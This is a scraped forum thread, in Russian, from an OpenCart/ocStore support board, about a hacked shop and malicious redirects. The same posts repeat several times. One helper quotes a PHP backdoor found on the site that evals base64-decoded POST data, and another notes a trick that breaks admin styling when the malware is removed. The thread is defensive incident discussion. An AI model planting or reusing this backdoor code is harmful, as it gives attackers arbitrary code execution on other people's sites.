основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами. В них может оказаться много полезной информации для опытного человека. это как симптомы болезни для врача. даже установленные права на эти файлы - это уже показатель. у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри. для этого нужны коды доступа (в личку, конечно). Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами. В них может оказаться много полезной информации для опытного человека. это как симптомы болезни для врача. даже установленные права на эти файлы - это уже показатель. у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри. для этого нужны коды доступа (в личку, конечно). Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options...
sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 